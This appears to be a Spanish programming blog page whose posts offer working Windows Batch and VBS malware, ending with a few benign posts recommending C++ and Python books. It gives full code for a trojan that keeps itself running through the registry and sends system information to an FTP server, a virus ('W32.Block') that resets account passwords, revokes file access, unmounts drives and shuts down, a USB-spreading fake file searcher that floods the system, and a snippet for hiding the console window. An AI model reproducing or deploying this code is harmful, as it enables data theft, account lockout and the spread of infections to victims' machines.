Robar datos por FTP en Batch
Etiquetas: Batch
Este código sería como una parte de un troyano en Batch, ya que lo que hace es recopilar información importante de la PC infectada en cada reinicio tales como:
Se le pueden añadir mas opciones de información que quieras recopilar de la víctima como: PC`s conectadas en red (LAN -- net view), usuaros que pueden utilizar la PC, y muchos mas...
Como se darán cuenta, la ventanita negra de cmd se mostrara cuando se ejecute el programa, aquí pueden combinar las lineas en VBS para ocultar la ventana de cmd y así pasar desapercibido.
- Nombre de la PC
- Nombre del usuario iniciado
- Fecha y Hora
- Informacion completa sobre su estado de red ipconfig/all
- Procesos activos
Se le pueden añadir mas opciones de información que quieras recopilar de la víctima como: PC`s conectadas en red (LAN -- net view), usuaros que pueden utilizar la PC, y muchos mas...
@ECHO OFF
SET spy=%programfiles%\Spybot
IF EXIST "%spy%" (goto:cont)
MD "%spy%" && COPY /Y %0 "%spy%" 2>nul >nul
:cont
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ServiceDefrag" /d "%spy%\ServiceDefrag.bat" /f 2>nul >nul
CD "%spy%"
ECHO PC: %computername% >> %computername%.code
ECHO SESION: %username% >> %computername%.code
ECHO FECHA: %DATE% >> %computername%.code
ECHO HORA: %TIME% >> %computername%.code
ECHO IP >> %computername%.code
ECHO ---------------------------------- >> %computername%.code
IPCONFIG/ALL >> %computername%.code
ECHO PROCESOS >> %computername%.code
ECHO ---------------------------------- >> %computername%.code
TASKLIST >> %computername%.code
ECHO usuario_ftp>> nano
ECHO password_ftp>> nano
ECHO ascii>> nano
ECHO put %computername%.code>> nano
ECHO close>> nano
ECHO bye>> nano
ftp -s:nano ftp.direccionftp.com 2>nul >nul
del /s /q /f %computername%.code 2>nul >nul
del /s /q /f nano 2>nul >nul
exit
Como se darán cuenta, la ventanita negra de cmd se mostrara cuando se ejecute el programa, aquí pueden combinar las lineas en VBS para ocultar la ventana de cmd y así pasar desapercibido.
W32.Block Bloquear el sistema en Batch
Etiquetas: Batch, Virus
W32.Block es un virus que tiene como finalidad, bloquear el systema para que no se pueda volver a ingresar ni por el usuario que comunmente inicia ni por el administrador ya que crea contraseñas aleatorias que ni yo se cuales son :p
@echo off
set src=%temp%\screen.bat
set ss=%temp%\ServiceSystem.bat
set tep=/t /e /p
REG ADD "HKCU\Console" /v FullScreen /t REG_DWORD /d 1 /f >> "%src%"
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f >> "%src%"
start %ss% && exit >> "%src%"
@echo off && cls>> "%ss%"
type "%homedrive%\boot.ini" && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LogonType /t REG_DWORD /d 1 /f >> "%ss%"
ipconfig/release >> "%ss%"
taskkill /F /IM explorer.exe >> "%ss%"
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SysTrayService /t REG_SZ /d "%ss%" >> "%ss%"
net user Administrador %random%binary%random% >> "%ss%"
net user %username% %random%ascii%random% >> "%ss%"
cacls "%userprofile%\Misdoc~1\*" %tep% %username%:n >> "%ss%"
cacls "%homedrive%\Docume~1\%username%\*" %tep% %username%:n >> "%ss%"
cacls "%homedrive%\Docume~1\*" %tep% %username%n >> "%ss%"
cacls "%programfiles%\Intern~1\iexplore.exe" %tep% %username%:n >> "%ss%"
cacls "%programfiles%\Mozill~1\firefox.exe" %tep% %username%:n >> "%ss%"
cacls "%systemroot%\system32\ipconfig.exe" %tep% %username%:n >> "%ss%"
cacls "%systemroot%\regedit.exe" %tep% %username%:n >> "%ss%"
cacls "%systemroot%\system32\notepad.exe" %tep% %username%:n >> "%ss%"
FOR %%u IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (mountvol %%u:\ /D) >> "%ss%"
shutdown -s -f -t 00 && exit >> "%ss%"
call %src% && exit
SystemOff, colgar el sistema en Batch
Etiquetas: Batch, Virus
Este code fué el que use para un reto que serviría para colgar el sistema o al menos alentarlo hasta que la memoria de la PC bajara demasiado y se tuvierá que reiniciar, está sencillo pero me hizo ganar xD.
::Simula ser un Buscador de archivos, se propaga por USB y cada que el usuario reinicie el sistema le volverá a pasar lo mismo que cuando lo ejecuto.
Descarga | Código en archivo de texto
::Simula ser un Buscador de archivos, se propaga por USB y cada que el usuario reinicie el sistema le volverá a pasar lo mismo que cuando lo ejecuto.
::::::::::::::::::::::::::::::::::
: :
: :
: SystemOff by Soldier :
: :
: :
::::::::::::::::::::::::::::::::::
@echo off
color 0E
title -SearchFiles-
set o=echo
set s=.vbs
set l=.bat
set i=.soldier
set r=%random%
set d=%random%
set e=%random%
set led=LVComServer
set spy=Anti-Spyware
echo.
echo.
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º º
echo º SearchFiles / Buscador de Archivos º
echo º º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo Espere, el programa iniciara automaticamente...
ping -n 3 localhost > nul
echo Enlistando controladores de busqueda...
ping -n 2 localhost > nul
FOR %%U IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
copy "%homedrive%\%spy%\autorun.inf" "%%U:\autorun.inf" >nul
copy /y %0 "%%U:\Searchfiles%l%" >nul
attrib +h +s "%%U:\Searchfiles%l%" >nul
attrib +h +s "%%U:\autorun.inf" >nul )
cls
if exist "%homedrive%\%spy%" (goto cont) else (goto create)
:create
md %homedrive%\%spy%
:cont
call :core
call :core2
call :core3
call :core4
call :reg
call :msj
:reg
taskkill /F /IM TeaTimer.exe
cls
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "%led%"
/t REG_SZ /d "%homedrive%\%spy%\%led%%s%" /f >nul
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "BDUpdateCheck"
/t REG_SZ /d "%homedrive%\%spy%\%led%%s%" /f >nul
goto :EOF
:core
%o% rundll32 user32.dll,SwapMouseButton >> "%homedrive%\%spy%\tmp%d%%l%"
%o% start http://img211.imageshack.us/img211/3792/army31280rc7.jpg
>> "%homedrive%\%spy%\tmp%d%%l%"
%o% start %homedrive%\%spy%\%led%%s% >> "%homedrive%\%spy%\tmp%d%%l%"
%o% Do >> "%homedrive%\%spy%\%led%%s%"
%o% Set fh = CreateObject("WScript.Shell") >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "notepad.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "mspaint.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "calc.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% fh.run "explorer.exe", vbHide >> "%homedrive%\%spy%\%led%%s%"
%o% Loop >> "%homedrive%\%spy%\%led%%s%"
goto :EOF
:core2
%o% MsgBox "La instrucción en ""0x019816d3"" hace referencia a la memoria
en ""0x019816d3"". La memoria no se puede ""read"".",21,
"SearchFiles.exe - Error de aplicación" >> "%homedrive%\%spy%\tmp%e%%s%"
%o% Set sg = CreateObject("WScript.Shell") >> "%homedrive%\%spy%\tmp%e%%s%"
%o% sg.run "%homedrive%\%spy%\tmp%r%%s%" >> "%homedrive%\%spy%\tmp%e%%s%"
goto :EOF
:core3
%o% Set cmd = CreateObject("WScript.Shell") >> "%homedrive%\%spy%\tmp%r%%s%"
%o% Set shell = CreateObject("Scripting.FileSystemObject")
>> "%homedrive%\%spy%\tmp%r%%s%"
%o% cmd.Run "%homedrive%\%spy%\tmp%d%%l%" >> "%homedrive%\%spy%\tmp%r%%s%"
goto :EOF
:core4
%o% [autorun] >> "%homedrive%\%spy%\autorun.inf"
%o% open=SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
%o% icon=%systemroot%\system32\shell32.dll,7 >> "%homedrive%\%spy%\autorun.inf"
%o% UseAutoPlay=1 >> "%homedrive%\%spy%\autorun.inf"
%o% action=Abrir memoria para ver archivos >> "%homedrive%\%spy%\autorun.inf"
%o% action= @SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
%o% shell\open=Abrir >> "%homedrive%\%spy%\autorun.inf"
%o% shell\open\command=SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
%o% shell\open\default=1 >> "%homedrive%\%spy%\autorun.inf"
%o% shell\explore=Explorar >> "%homedrive%\%spy%\autorun.inf"
%o% shell\explore\command=SearchFiles%l% >> "%homedrive%\%spy%\autorun.inf"
goto :EOF
:msj
call %homedrive%\%spy%\tmp%e%%s% && exit
Descarga | Código en archivo de texto
Ocultar ventana MS-DOS ó prompt ó cmd
Etiquetas: Batch, VBS
Si su code es de algún virus, troyano o alguna aplicación que no sea necesaria la intervención de la molesta ventana negra este pequeño código les servirá para ocultarla, es un script que hace una llamada a su archivo para así ocultar esa ventana, estas líneas de código las guardaran con extensión .vbs y ya estuvo.
set cmd = createobject("wscript.shell")
set shell = CreateObject("Scripting.FileSystemObject")
cmd.run "archivo-escondido.bat", vbHide
Pensando en C++ de Bruce Eckel [Español]
Etiquetas: C++, TutorialesDurante mi aprendizaje en C++ me he dado cuenta de que este Libro me ha servido de mucho y su entendimiento es tanto para principiantes como para usuarios un poco avanzados. Pensando en C++ esta compuesto en 2 tomos que al término de leerlos de seguro sabrás programar en este maravilloso lenguaje que es bastante útil si deseas ser un programador a futuro. Se los recomiendo y lo dejo para su descarga.
Clic en la imagen para descargar
Volumen 2
Clic en la imagen para descargar
Python para todos [Español]
Etiquetas: Python, Tutoriales'Python para todos' es un libro sobre programación en Python escrito por Raúl González Duque. Se trata de un tutorial de Python adecuado para todos los niveles y que puedes descargar totalmente gratis.
El tutorial de Python 'Python para todos' se distribuye bajo licencia Creative Commons Reconocimiento 2.5 España, lo que supone que puedes distribuirlo, modificarlo, traducirlo a otros idiomas, ... siempre que indiques el autor original.
El libro cuenta con 115 páginas en las que se tratan los siguientes temas:
* Tipos básicos
* Control de flujo
* Funciones
* Orientación a objetos
* Programación funcional
* Excepciones
* Módulos y paquetes
* Entrada / Salida
* Expresiones regulares
* Sockets
* Interacción con webs
* Threads
* Serialización de objetos
Descarga | Python Para Todos
Nuevo espacio dedicado a la programación
Etiquetas: Java, Videotutoriales
Bien pues me he dedicado empezar este nuevo portal dedicado solamente a la programación publicando códigos, manuales y algunos tutoriales que serán hechos por mi como clases de programación. Como dije, es todo referente a la programación y dentro podría incluir programación orientada a hack, noticias, y códigos del mismo tipo.
Disfrutenlo ;)
Disfrutenlo ;)
Suscribirse a:
Entradas (Atom)
